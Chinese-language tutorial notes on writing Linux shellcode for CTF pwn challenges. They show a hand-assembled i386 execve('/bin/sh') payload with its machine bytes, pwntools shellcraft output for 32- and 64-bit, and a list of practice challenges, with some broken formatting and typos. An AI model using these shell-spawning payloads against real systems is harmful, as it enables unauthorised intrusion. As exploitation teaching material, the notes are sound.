shell code 编写

介绍

shellcode 是软件漏洞利用中的一小段机器码

作用

• 启动shell ，进行交互
• 打开服务器端口等待连接
• 反向连接端口

简单shell 程序

#include "stdlib"
#include "unistd.h"
void main(){
    system("/bin/sh");
    exit(0);
}

软中断

• 软中断触发 int 0x80 syscall 系统调用
• execve("/bin/sh",0,0)
• linux syscall table
  • https://chromium.googlesource.com/chromiumos/docs/+/HEAD/constants/syscalls.md
  • https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
  • https://thevivekpandey.github.io/posts/2017-09-25-linux-system-calls.html
  • http://faculty.nps.edu/cseagle/assembly/sys_call.html
  • https://filippo.io/linux-syscall-table/
• windows
  • https://sys.oddcoder.com/windows_x86.html
  • https://github.com/tinysec/windows-syscall-table

1. 设置 ebx 指向 /bin/sh
2. ecx =0 ，edx = 0
3. eax =0xb
4. int 0x80 触发软中断 ```c └─# cat i386.asm ;;nasm -f elf32 i386.asm ;;ld -m elf_i386 -o i386 i386.o ;; objdump -d i386 global _start _start:

    push "/sh"
    push "/bin"
    mov ebx,esp
    xor edx,edx;;edx=0
    xor ecx,ecx;;ecx=0
    mov al,0xb;;set al =0xb
    int 0x80

```c
─# objdump -d i386  
i386：     文件格式 elf32-i386
Disassembly of section .text:
08049000 <_start>:
 8049000:       68 2f 73 68 00          push   $0x68732f
 8049005:       68 2f 62 69 6e          push   $0x6e69622f
 804900a:       89 e3                   mov    %esp,%ebx
 804900c:       31 d2                   xor    %edx,%edx
 804900e:       31 c9                   xor    %ecx,%ecx
 8049010:       b0 0b                   mov    $0xb,%al
 8049012:       cd 80                   int    $0x80

PWNTOOLS 生成

使用pwntools 快速生成对应架构shellcode

1. 设置目标架构
2. 生成shellcode

   32 位

   ```python from pwn import * context(log_level=’debug’,arch=’i386’,os=’linux’) shellcode=asm(shellsraft.sh())

/ execve(path=’/bin///sh’, argv=[‘sh’], envp=0) / / push b’/bin///sh\x00’ / push 0x68 push 0x732f2f2f push 0x6e69622f mov ebx, esp / push argument array [‘sh\x00’] / / push ‘sh\x00\x00’ / push 0x1010101 xor dword ptr [esp], 0x1016972 xor ecx, ecx push ecx / null terminate / push 4 pop ecx add ecx, esp push ecx / ‘sh\x00’ / mov ecx, esp xor edx, edx / call execve() / push SYS_execve / 0xb / pop eax int 0x80

<a name="dzBoI"></a>
### 64位
```python
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
shellcode=asm(shellcraft.sh())
 /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    mov rax, 0x732f2f2f6e69622f
    push rax
    mov rdi, rsp
    /* push argument array ['sh\x00'] */
    /* push b'sh\x00' */
    push 0x1010101 ^ 0x6873
    xor dword ptr [rsp], 0x1010101
    xor esi, esi /* 0 */
    push rsi /* null terminate */
    push 8
    pop rsi
    add rsi, rsp
    push rsi /* 'sh\x00' */
    mov rsi, rsp
    xor edx, edx /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall

mrctf2020_shellcode

ciscn_2019_s_9

pwnable_orw

mrctf2020_shellcode_revenge

shellcode 编码|alpha